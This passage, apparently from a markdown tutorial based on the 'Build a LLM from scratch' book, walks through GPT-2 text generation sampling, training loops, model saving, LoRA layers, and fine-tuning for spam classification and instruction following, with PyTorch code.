    return tokenizer.decode(flat.tolist())
```

### Generate text functions

In a previous section, a function was shown that simply picked the **most probable token** after getting the logits. However, this means that for each input the same output is always going to be generated, which makes it very deterministic.

The following `generate_text` function applies the `top-k`, `temperature` and `multinomial` concepts.

- **`top-k`** means that we start reducing to `-inf` the probabilities of all the tokens except the top k tokens. So, if k=3, before making a decision only the 3 most probable tokens will have a probability different from `-inf`.
- **`temperature`** means that every logit is divided by the temperature value. A value of `0.1` will boost the highest probability compared with the lowest one, while a temperature of `5`, for example, will make the distribution flatter. This helps introduce the variation in responses we would like the LLM to have. A small numeric demo of this effect follows this list.
- After applying the temperature, a **`softmax`** function is applied again so that all the remaining tokens have a total probability of 1.
- Finally, instead of choosing the token with the highest probability, **`multinomial`** sampling is applied to **predict the next token according to the final probabilities**. So if token 1 has a 70% probability, token 2 a 20% and token 3 a 10%, then 70% of the time token 1 will be selected, 20% of the time it will be token 2, and 10% of the time it will be token 3.

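To make the temperature effect concrete, here is a tiny self-contained demo (the logit values are made up for illustration; the printed probabilities are approximate):

```python
import torch

logits = torch.tensor([2.0, 1.0, 0.1])  # hypothetical logits for 3 tokens
for T in (0.1, 1.0, 5.0):
    probs = torch.softmax(logits / T, dim=-1)
    print(f"T={T}: {probs.tolist()}")
# T=0.1 -> ~[1.00, 0.00, 0.00] (near-greedy)
# T=1.0 -> ~[0.66, 0.24, 0.10]
# T=5.0 -> ~[0.40, 0.33, 0.27] (much flatter, more varied sampling)
```
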
```python
# Generate text function
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):

    # For-loop is the same as before: Get logits, and only focus on last time step
    for _ in range(max_new_tokens):
        idx_cond = idx[:, -context_size:]
        with torch.no_grad():
            logits = model(idx_cond)
        logits = logits[:, -1, :]

        # New: Filter logits with top_k sampling
        if top_k is not None:
            # Keep only top_k values
            top_logits, _ = torch.topk(logits, top_k)
            min_val = top_logits[:, -1]
            logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)

        # New: Apply temperature scaling
        if temperature > 0.0:
            logits = logits / temperature

            # Apply softmax to get probabilities
            probs = torch.softmax(logits, dim=-1)  # (batch_size, context_len)

            # Sample from the distribution
            idx_next = torch.multinomial(probs, num_samples=1)  # (batch_size, 1)

        # Otherwise same as before: get idx of the vocab entry with the highest logits value
        else:
            idx_next = torch.argmax(logits, dim=-1, keepdim=True)  # (batch_size, 1)

        if idx_next == eos_id:  # Stop generating early if end-of-sequence token is encountered and eos_id is specified
            break

        # Same as before: append sampled index to the running sequence
        idx = torch.cat((idx, idx_next), dim=1)  # (batch_size, num_tokens+1)

    return idx
```
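
For reference, a minimal usage sketch (the `top_k` and `temperature` values here are just illustrative):

```python
torch.manual_seed(123)
token_ids = generate_text(
    model=model,
    idx=text_to_token_ids("Every effort moves you", tokenizer).to(device),
    max_new_tokens=25,
    context_size=GPT_CONFIG_124M["context_length"],
    top_k=25,
    temperature=1.4
)
print("Output text:\n", token_ids_to_text(token_ids, tokenizer))
```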

> [!NOTE]
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which, instead of keeping the k most probable samples, **sorts** the whole resulting **vocabulary** by probability and **sums** the probabilities from the highest to the lowest until a **threshold is reached**.
>
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities.
>
> This removes the need to select a fixed number of `k` samples, as the optimal k might be different in each case; **only a threshold** is needed.
>
> _Note that this improvement isn't included in the previous code._
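
As a rough illustration, a top-p filter could replace the top-k block inside `generate_text` with something like the following sketch (this is one possible implementation, not code from the book):

```python
def top_p_filter(logits, top_p=0.9):
    # Sort tokens from most to least probable
    sorted_logits, sorted_idx = torch.sort(logits, descending=True, dim=-1)
    sorted_probs = torch.softmax(sorted_logits, dim=-1)
    cum_probs = torch.cumsum(sorted_probs, dim=-1)
    # Mask every token once the cumulative probability has passed the threshold
    mask = cum_probs - sorted_probs > top_p
    sorted_logits[mask] = float("-inf")
    # Undo the sort so the logits line up with the vocabulary again
    return sorted_logits.gather(-1, sorted_idx.argsort(-1))
```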

> [!NOTE]
> Another way to improve the generated text is by using **Beam search** instead of the greedy search used in this example.\
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top 𝑘 highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
>
> _Note that this improvement isn't included in the previous code._

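A minimal sketch of what beam search over this model could look like (a hypothetical helper assuming the same `model` interface as `generate_text`; log-probabilities are summed to score each beam):

```python
import torch

def beam_search(model, idx, max_new_tokens, context_size, beam_width=3):
    # Each beam is a (sequence, cumulative log-probability) pair; start with the prompt
    beams = [(idx, 0.0)]
    for _ in range(max_new_tokens):
        candidates = []
        for seq, score in beams:
            with torch.no_grad():
                logits = model(seq[:, -context_size:])
            log_probs = torch.log_softmax(logits[:, -1, :], dim=-1)
            top_lp, top_ids = torch.topk(log_probs, beam_width)
            for lp, tok in zip(top_lp[0], top_ids[0]):
                new_seq = torch.cat((seq, tok.view(1, 1)), dim=1)
                candidates.append((new_seq, score + lp.item()))
        # Keep only the best `beam_width` partial sequences
        beams = sorted(candidates, key=lambda c: c[1], reverse=True)[:beam_width]
    return beams[0][0]  # highest-scoring sequence

```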
### Loss functions

The **`calc_loss_batch`** function calculates the cross entropy of a prediction for a single batch.\
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
```python
# Define loss functions
def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)
    loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
    return loss

def calc_loss_loader(data_loader, model, device, num_batches=None):
    total_loss = 0.
    if len(data_loader) == 0:
        return float("nan")
    elif num_batches is None:
        num_batches = len(data_loader)
    else:
        # Reduce the number of batches to match the total number of batches in the data loader
        # if num_batches exceeds the number of batches in the data loader
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            total_loss += loss.item()
        else:
            break
    return total_loss / num_batches
```

> [!NOTE]
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model's parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
>
> _Note that this improvement isn't included in the previous code._
>
> Check the following example:

<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>

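In PyTorch this is a one-liner with `torch.nn.utils.clip_grad_norm_`; it would go between `loss.backward()` and `optimizer.step()` inside `train_model_simple` (the `max_norm=1.0` value is just a common default, not something fixed by the book):

```python
loss.backward()  # Calculate loss gradients
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)  # Clip gradients
optimizer.step()  # Update model weights using loss gradients
```
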
### Loading Data

The function `create_dataloader_v1` was already discussed in a previous section.

From here, note how it's defined that 90% of the text is going to be used for training while 10% will be used for validation, and both sets are stored in 2 different data loaders.\
Note that sometimes part of the data set is also left as a test set to better evaluate the performance of the model.

Both data loaders use the same batch size, maximum length, stride and number of workers (0 in this case).\
The main differences are the data used by each, and that the validation loader is neither dropping the last batch nor shuffling the data, as that isn't needed for validation purposes.

Also, the fact that the **stride is as big as the context length** means that there won't be overlapping between the contexts used to train the data (this reduces overfitting, but also shrinks the training data set).

Moreover, note that the batch size in this case is 2, so the data is divided into batches of 2; the main goal of this is to allow parallel processing and reduce the memory consumption per batch.
```python
train_ratio = 0.90
split_idx = int(train_ratio * len(text_data))
train_data = text_data[:split_idx]
val_data = text_data[split_idx:]

torch.manual_seed(123)

train_loader = create_dataloader_v1(
    train_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=True,
    shuffle=True,
    num_workers=0
)

val_loader = create_dataloader_v1(
    val_data,
    batch_size=2,
    max_length=GPT_CONFIG_124M["context_length"],
    stride=GPT_CONFIG_124M["context_length"],
    drop_last=False,
    shuffle=False,
    num_workers=0
)
```

## Sanity Checks

The goal is to check that there are enough tokens for training, that the shapes are the expected ones, and to get some info about the number of tokens used for training and for validation:
```python
# Sanity checks
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the training loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "increase the `training_ratio`")

if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
    print("Not enough tokens for the validation loader. "
          "Try to lower the `GPT_CONFIG_124M['context_length']` or "
          "decrease the `training_ratio`")

print("Train loader:")
for x, y in train_loader:
    print(x.shape, y.shape)

print("\nValidation loader:")
for x, y in val_loader:
    print(x.shape, y.shape)

train_tokens = 0
for input_batch, target_batch in train_loader:
    train_tokens += input_batch.numel()

val_tokens = 0
for input_batch, target_batch in val_loader:
    val_tokens += input_batch.numel()

print("Training tokens:", train_tokens)
print("Validation tokens:", val_tokens)
print("All tokens:", train_tokens + val_tokens)
```

### Select device for training & pre-calculations

The following code just selects the device to use and calculates the initial training loss and validation loss (without having trained anything yet) as a starting point.
```python
# Indicate the device to use
if torch.cuda.is_available():
    device = torch.device("cuda")
elif torch.backends.mps.is_available():
    device = torch.device("mps")
else:
    device = torch.device("cpu")

print(f"Using {device} device.")

model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes

# Pre-calculate losses without starting training yet
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader

with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
    train_loss = calc_loss_loader(train_loader, model, device)
    val_loss = calc_loss_loader(val_loader, model, device)

print("Training loss:", train_loss)
print("Validation loss:", val_loss)
```

### Training functions

The function `generate_and_print_sample` just takes a context and generates some tokens in order to get a feeling of how good the model is at that point. This is called by `train_model_simple` on each epoch.

The function `evaluate_model` is called as frequently as indicated to the training function, and it's used to measure the train loss and the validation loss at that point in the model training.

Then the big function `train_model_simple` is the one that actually trains the model. It expects:

- The train data loader (with the data already separated and prepared for training)
- The validation loader
- The **optimizer** to use during training: This is the function that will use the gradients and update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
- `optimizer.zero_grad()` is called to reset the gradients on each round so they don't accumulate.
- The **`lr`** param is the **learning rate**, which determines the **size of the steps** taken during the optimization process when updating the model's parameters. A **smaller** learning rate means the optimizer **makes smaller updates** to the weights, which can lead to more **precise** convergence but might **slow down** training. A **larger** learning rate can speed up training but **risks overshooting** the minimum of the loss function (**jumping over** the point where the loss function is minimized).
- **Weight Decay** modifies the **Loss Calculation** step by adding an extra term that penalizes large weights. This encourages the optimizer to find solutions with smaller weights, balancing between fitting the data well and keeping the model simple, preventing overfitting in machine learning models by discouraging the model from assigning too much importance to any single feature.
- Traditional optimizers like SGD with L2 regularization couple weight decay with the gradient of the loss function. However, **AdamW** (a variant of the Adam optimizer) decouples weight decay from the gradient update, leading to more effective regularization.
- The device to use for training
- The number of epochs: Number of times to go over the training data
- The evaluation frequency: The frequency with which to call `evaluate_model`
- The evaluation iteration: The number of batches to use when evaluating the current state of the model with `evaluate_model`
- The start context: The starting sentence to use when calling `generate_and_print_sample`
- The tokenizer

```python
# Functions to train the model
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
                       eval_freq, eval_iter, start_context, tokenizer):
    # Initialize lists to track losses and tokens seen
    train_losses, val_losses, track_tokens_seen = [], [], []
    tokens_seen, global_step = 0, -1

    # Main training loop
    for epoch in range(num_epochs):
        model.train()  # Set model to training mode

        for input_batch, target_batch in train_loader:
            optimizer.zero_grad() # Reset loss gradients from previous batch iteration
            loss = calc_loss_batch(input_batch, target_batch, model, device)
            loss.backward() # Calculate loss gradients
            optimizer.step() # Update model weights using loss gradients
            tokens_seen += input_batch.numel()
            global_step += 1

            # Optional evaluation step
            if global_step % eval_freq == 0:
                train_loss, val_loss = evaluate_model(
                    model, train_loader, val_loader, device, eval_iter)
                train_losses.append(train_loss)
                val_losses.append(val_loss)
                track_tokens_seen.append(tokens_seen)
                print(f"Ep {epoch+1} (Step {global_step:06d}): "
                      f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")

        # Print a sample text after each epoch
        generate_and_print_sample(
            model, tokenizer, device, start_context
        )

    return train_losses, val_losses, track_tokens_seen


def evaluate_model(model, train_loader, val_loader, device, eval_iter):
    model.eval()  # Set in eval mode to avoid dropout
    with torch.no_grad():
        train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
        val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
    model.train()  # Back to training mode applying all the configurations
    return train_loss, val_loss


def generate_and_print_sample(model, tokenizer, device, start_context):
    model.eval()  # Set in eval mode to avoid dropout
    context_size = model.pos_emb.weight.shape[0]
    encoded = text_to_token_ids(start_context, tokenizer).to(device)
    with torch.no_grad():
        token_ids = generate_text(
            model=model, idx=encoded,
            max_new_tokens=50, context_size=context_size
        )
    decoded_text = token_ids_to_text(token_ids, tokenizer)
    print(decoded_text.replace("\n", " "))  # Compact print format
    model.train()  # Back to training mode applying all the configurations
```

> [!NOTE]
> To improve the learning rate there are a couple of relevant techniques called **linear warmup** and **cosine decay**.
>
> **Linear warmup** consists of defining an initial learning rate and a maximum one, and progressively increasing the rate during the first part of training. This is because starting the training with smaller weight updates decreases the risk of the model encountering large, destabilizing updates during its training phase.\
> **Cosine decay** is a technique that **gradually reduces the learning rate** following a half-cosine curve **after the warmup** phase, slowing weight updates to **minimize the risk of overshooting** the loss minima and ensure training stability in later phases.
>
> _Note that these improvements aren't included in the previous code._

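A minimal sketch of both ideas combined, assuming a per-step schedule (the `peak_lr`, `warmup_steps` and `total_steps` values are illustrative):

```python
import math

def lr_at_step(step, peak_lr=4e-4, min_lr=4e-5, warmup_steps=20, total_steps=1000):
    if step < warmup_steps:
        # Linear warmup from 0 up to peak_lr
        return peak_lr * (step + 1) / warmup_steps
    # Cosine decay from peak_lr down to min_lr over the remaining steps
    progress = (step - warmup_steps) / max(1, total_steps - warmup_steps)
    return min_lr + 0.5 * (peak_lr - min_lr) * (1 + math.cos(math.pi * progress))

# Inside the training loop it would be applied before optimizer.step():
# for param_group in optimizer.param_groups:
#     param_group["lr"] = lr_at_step(global_step)
```
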
### Start training

```python
import time
start_time = time.time()

torch.manual_seed(123)
model = GPTModel(GPT_CONFIG_124M)
model.to(device)
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)

num_epochs = 10
train_losses, val_losses, tokens_seen = train_model_simple(
    model, train_loader, val_loader, optimizer, device,
    num_epochs=num_epochs, eval_freq=5, eval_iter=5,
    start_context="Every effort moves you", tokenizer=tokenizer
)

end_time = time.time()
execution_time_minutes = (end_time - start_time) / 60
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
```

### Print training evolution

With the following function it's possible to plot the evolution of the model while it was being trained.
```python
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import math

def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
    fig, ax1 = plt.subplots(figsize=(5, 3))
    ax1.plot(epochs_seen, train_losses, label="Training loss")
    ax1.plot(
        epochs_seen, val_losses, linestyle="-.", label="Validation loss"
    )
    ax1.set_xlabel("Epochs")
    ax1.set_ylabel("Loss")
    ax1.legend(loc="upper right")
    ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
    ax2 = ax1.twiny()
    ax2.plot(tokens_seen, train_losses, alpha=0)  # Invisible plot to align the token axis
    ax2.set_xlabel("Tokens seen")
    fig.tight_layout()
    plt.show()

# Compute perplexity from the loss values
train_ppls = [math.exp(loss) for loss in train_losses]
val_ppls = [math.exp(loss) for loss in val_losses]

# Plot perplexity over tokens seen
plt.figure()
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
plt.xlabel('Tokens Seen')
plt.ylabel('Perplexity')
plt.title('Perplexity over Training')
plt.legend()
plt.show()

epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
```

### Save the model

It's possible to save the model + optimizer if you want to continue training later:
```python
# Save the model and the optimizer for later training
torch.save({
    "model_state_dict": model.state_dict(),
    "optimizer_state_dict": optimizer.state_dict(),
    },
    "/tmp/model_and_optimizer.pth"
)
# Note that this model with the optimizer occupied close to 2GB

# Restore model and optimizer for training
checkpoint = torch.load("/tmp/model_and_optimizer.pth", map_location=device)

model = GPTModel(GPT_CONFIG_124M)
model.load_state_dict(checkpoint["model_state_dict"])
optimizer = torch.optim.AdamW(model.parameters(), lr=5e-4, weight_decay=0.1)
optimizer.load_state_dict(checkpoint["optimizer_state_dict"])
model.train();  # Put in training mode
```

Or just the model if you are planning on just using it:
```python
# Save the model
torch.save(model.state_dict(), "model.pth")

# Load it
model = GPTModel(GPT_CONFIG_124M)

model.load_state_dict(torch.load("model.pth", map_location=device))

model.eval()  # Put in eval mode
```

## Loading GPT2 weights

There are 2 quick scripts to load the GPT2 weights locally. For both you can clone the repository [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch) locally, then:

- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) will download all the weights and transform the formats from OpenAI's to the ones expected by our LLM. The script is also prepared with the needed configuration and with the prompt: "Every effort moves you"
- The script [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) allows you to load any of the GPT2 weights locally (just change the `CHOOSE_MODEL` var) and predict text from some prompts.

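As a rough sketch of the second approach (assuming the `transformers` package is installed; the model name strings follow Hugging Face's naming):

```python
from transformers import GPT2Model

# "gpt2" is the 124M model; "gpt2-medium", "gpt2-large" and "gpt2-xl" also exist
gpt_hf = GPT2Model.from_pretrained("gpt2", cache_dir="checkpoints")
gpt_hf.eval()
# From here, the referenced notebook copies these weights into the GPTModel defined above
```
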
## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,61 +0,0 @@
# 7.0. LoRA Improvements in Fine-Tuning

## LoRA Improvements

> [!TIP]
> Using **LoRA greatly reduces the computation** needed to **fine-tune** already trained models.

LoRA makes it possible to fine-tune **large models** efficiently by only changing a **small part** of the model. It reduces the number of parameters that need to be trained, saving **memory** and **computational resources**. This is because:

1. **It reduces the number of trainable parameters**: Instead of updating the whole weight matrix of the model, LoRA **splits** the weight matrix update into two smaller matrices (called **A** and **B**). This makes the training **faster** and requires **less memory** because fewer parameters need to be updated.

   1. This is because instead of calculating the complete weight update of a layer (matrix), it approximates it as the product of 2 smaller matrices, reducing the computation needed for the update:\

   <figure><img src="../../images/image (9) (1).png" alt=""><figcaption></figcaption></figure>

2. **It keeps the original model weights unchanged**: LoRA allows you to keep the original model weights the same and only update the **new small matrices** (A and B). This is helpful because it means the model's original knowledge is preserved and you only adjust what's necessary.
3. **Efficient task-specific fine-tuning**: When you want to adapt the model to a **new task**, you can just train the **small LoRA matrices** (A and B) while leaving the rest of the model as it is. This is **much more efficient** than retraining the whole model.
4. **Storage efficiency**: After fine-tuning, instead of saving a **whole new model** for each task, you only need to store the **LoRA matrices**, which are tiny compared to the whole model. This makes it easier to adapt the model to many tasks without using too much storage.

In order to implement LoRA layers instead of Linear ones during fine-tuning, this code is proposed here [https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/appendix-E/01_main-chapter-code/appendix-E.ipynb):
```python
import math
import torch

# Create the LoRA layer with the 2 matrices and the alpha
class LoRALayer(torch.nn.Module):
    def __init__(self, in_dim, out_dim, rank, alpha):
        super().__init__()
        self.A = torch.nn.Parameter(torch.empty(in_dim, rank))
        torch.nn.init.kaiming_uniform_(self.A, a=math.sqrt(5))  # similar to standard weight initialization
        self.B = torch.nn.Parameter(torch.zeros(rank, out_dim))
        self.alpha = alpha

    def forward(self, x):
        x = self.alpha * (x @ self.A @ self.B)
        return x

# Combine it with the linear layer
class LinearWithLoRA(torch.nn.Module):
    def __init__(self, linear, rank, alpha):
        super().__init__()
        self.linear = linear
        self.lora = LoRALayer(
            linear.in_features, linear.out_features, rank, alpha
        )

    def forward(self, x):
        return self.linear(x) + self.lora(x)

# Replace linear layers with LoRA ones
def replace_linear_with_lora(model, rank, alpha):
    for name, module in model.named_children():
        if isinstance(module, torch.nn.Linear):
            # Replace the Linear layer with LinearWithLoRA
            setattr(model, name, LinearWithLoRA(module, rank, alpha))
        else:
            # Recursively apply the same function to child modules
            replace_linear_with_lora(module, rank, alpha)
```
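
A short usage sketch (the `rank` and `alpha` values are illustrative and mirror those used in the referenced notebook):

```python
# Freeze the original weights so only the LoRA matrices are trained
for param in model.parameters():
    param.requires_grad = False

replace_linear_with_lora(model, rank=16, alpha=16)

trainable = sum(p.numel() for p in model.parameters() if p.requires_grad)
print(f"Trainable LoRA parameters: {trainable:,}")
```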

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,117 +0,0 @@
# 7.1. Fine-Tuning for Classification

## What is

Fine-tuning is the process of taking a **pre-trained model** that has learned **general language patterns** from vast amounts of data and **adapting** it to perform a **specific task** or to understand domain-specific language. This is achieved by continuing the training of the model on a smaller, task-specific dataset, allowing it to adjust its parameters to better suit the nuances of the new data while leveraging the broad knowledge it has already acquired. Fine-tuning enables the model to deliver more accurate and relevant results in specialized applications without the need to train a new model from scratch.

> [!NOTE]
> As pre-training an LLM that "understands" the text is pretty expensive, it's usually easier and cheaper to fine-tune open-source pre-trained models to perform the specific task we want them to perform.

> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM will give the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).

## Preparing the data set

### Data set size

Of course, in order to fine-tune a model you need some structured data to use to specialise your LLM. In the example proposed in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb), GPT2 is fine-tuned to detect if an email is spam or not using the data from [https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip).

This data set contains many more examples of "not spam" than of "spam"; therefore the book suggests **using only as many examples of "not spam" as of "spam"** (removing all the extra examples from the training data). In this case, this was 747 examples of each.

Then, **70%** of the data set is used for **training**, **10%** for **validation** and **20%** for **testing**.

- The **validation set** is used during the training phase to fine-tune the model's **hyperparameters** and make decisions about model architecture, effectively helping to prevent overfitting by providing feedback on how the model performs on unseen data. It allows for iterative improvements without biasing the final evaluation.
- This means that although the data included in this set is not used for the training directly, it's used to tune the best **hyperparameters**, so this set cannot be used to evaluate the performance of the model like the testing one.
- In contrast, the **test set** is used **only after** the model has been fully trained and all adjustments are complete; it provides an unbiased assessment of the model's ability to generalize to new, unseen data. This final evaluation on the test set gives a realistic indication of how the model is expected to perform in real-world applications.

### Entries length

As the training expects entries (email texts in this case) of the same length, it was decided to make every entry as large as the largest one by adding the ids of `<|endoftext|>` as padding. A minimal sketch of this padding step follows.

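This sketch assumes the GPT-2 `tiktoken` tokenizer, whose id for `<|endoftext|>` is 50256 (the sample texts are made up):

```python
import tiktoken

tokenizer = tiktoken.get_encoding("gpt2")
pad_id = 50256  # id of <|endoftext|> in the GPT-2 vocabulary

texts = ["You won a prize!", "See you tomorrow at the meeting"]
encoded = [tokenizer.encode(t) for t in texts]
max_len = max(len(e) for e in encoded)
padded = [e + [pad_id] * (max_len - len(e)) for e in encoded]
# All entries now share the same length and can be stacked into one tensor
```
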
### Initialize the model

Using the open-source pre-trained weights, initialize the model to train. We have already done this before; following the instructions of [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) you can easily do it.

## Classification head

In this specific example (predicting whether a text is spam or not), we are not interested in fine-tuning according to the complete vocabulary of GPT2; we only want the new model to say if the email is spam (1) or not (0). Therefore, we are going to **modify the final layer that** gives the probabilities per token of the vocabulary into one that only gives the probabilities of being spam or not (like a vocabulary of 2 words).

```python
# This code modifies the final layer with a Linear one with 2 outs
num_classes = 2
model.out_head = torch.nn.Linear(
    in_features=BASE_CONFIG["emb_dim"],
    out_features=num_classes
)
```

## Parameters to tune

In order to fine-tune fast, it's easier not to fine-tune all the parameters but only some final ones. This is because it's known that the lower layers generally capture basic language structures and semantics that are applicable across tasks. So, just **fine-tuning the last layers is usually enough and faster**.
```python
# This code makes all the parameters of the model untrainable
for param in model.parameters():
    param.requires_grad = False

# Allow to fine-tune the last layer in the transformer block
for param in model.trf_blocks[-1].parameters():
    param.requires_grad = True

# Allow to fine-tune the final layer norm
for param in model.final_norm.parameters():
    param.requires_grad = True
```

## Entries to use for training

In previous sections the LLM was trained by reducing the loss of every predicted token, even though almost all the predicted tokens were in the input sentence (only 1 at the end was really predicted), so that the model understands the language better.

In this case we only care about the model being able to predict if the text is spam or not, so we only care about the last token predicted. Therefore, it's needed to modify our previous training loss functions to only take that token into account.

This is implemented in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) as:
```python
def calc_accuracy_loader(data_loader, model, device, num_batches=None):
    model.eval()
    correct_predictions, num_examples = 0, 0

    if num_batches is None:
        num_batches = len(data_loader)
    else:
        num_batches = min(num_batches, len(data_loader))
    for i, (input_batch, target_batch) in enumerate(data_loader):
        if i < num_batches:
            input_batch, target_batch = input_batch.to(device), target_batch.to(device)

            with torch.no_grad():
                logits = model(input_batch)[:, -1, :]  # Logits of last output token
            predicted_labels = torch.argmax(logits, dim=-1)

            num_examples += predicted_labels.shape[0]
            correct_predictions += (predicted_labels == target_batch).sum().item()
        else:
            break
    return correct_predictions / num_examples


def calc_loss_batch(input_batch, target_batch, model, device):
    input_batch, target_batch = input_batch.to(device), target_batch.to(device)
    logits = model(input_batch)[:, -1, :]  # Logits of last output token
    loss = torch.nn.functional.cross_entropy(logits, target_batch)
    return loss
```

Note how for each batch we are only interested in the **logits of the last token predicted**.

## Complete GPT2 fine-tune classification code

You can find all the code to fine-tune GPT2 to be a spam classifier in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,100 +0,0 @@
# 7.2. Fine-Tuning to Follow Instructions

> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.

## Dataset

In order to fine-tune an LLM to follow instructions, a dataset with instructions and responses is needed to fine-tune the LLM. There are different formats to train an LLM to follow instructions, for example:

- The Apply Alpaca prompt style example:
```csharp
Below is an instruction that describes a task. Write a response that appropriately completes the request.

### Instruction:
Calculate the area of a circle with a radius of 5 units.

### Response:
The area of a circle is calculated using the formula \( A = \pi r^2 \). Plugging in the radius of 5 units:

\( A = \pi (5)^2 = \pi \times 25 = 25\pi \) square units.
```
- The Phi-3 prompt style example:
```vbnet
<|User|>
Can you explain what gravity is in simple terms?

<|Assistant|>
Absolutely! Gravity is a force that pulls objects toward each other.
```

Training an LLM with these kinds of datasets, instead of just raw text, helps the LLM understand that it needs to give specific responses to the questions it receives.

Therefore, one of the first things to do with a dataset that contains requests and answers is to model that data in the desired prompt format, like:
```python
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
def format_input(entry):
    instruction_text = (
        f"Below is an instruction that describes a task. "
        f"Write a response that appropriately completes the request."
        f"\n\n### Instruction:\n{entry['instruction']}"
    )

    input_text = f"\n\n### Input:\n{entry['input']}" if entry["input"] else ""

    return instruction_text + input_text

model_input = format_input(data[50])

desired_response = f"\n\n### Response:\n{data[50]['output']}"

print(model_input + desired_response)
```

Then, as always, the dataset needs to be split into training, validation and test sets.

## Batching and Data Loaders

Then, all the inputs and expected outputs need to be batched for training. For this, it's needed to:

- Tokenize the texts
- Pad all the samples to the same length (usually the length will be as big as the context length used to pre-train the LLM)
- Create the expected tokens by shifting the input 1 position to the right in a custom collate function
- Replace some padding tokens with -100 to exclude them from the training loss: after the first `endoftext` token, substitute all the other `endoftext` tokens by -100 (because using `cross_entropy(..., ignore_index=-100)` means that it will ignore targets with -100)
- \[Optional\] Mask using -100 also all the tokens belonging to the question, so the LLM learns only how to generate the answer. In the Apply Alpaca style this will mean masking everything until `### Response:`

With this created, it's time to create the data loaders for each dataset (training, validation and test). A sketch of such a collate function follows.

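A minimal sketch of such a custom collate function, assuming entries are already tokenized id lists and `50256` is the `<|endoftext|>` pad id (a hypothetical helper modeled on the chapter's approach; the question-masking step is omitted for brevity):

```python
import torch

def custom_collate(batch, pad_id=50256, ignore_index=-100):
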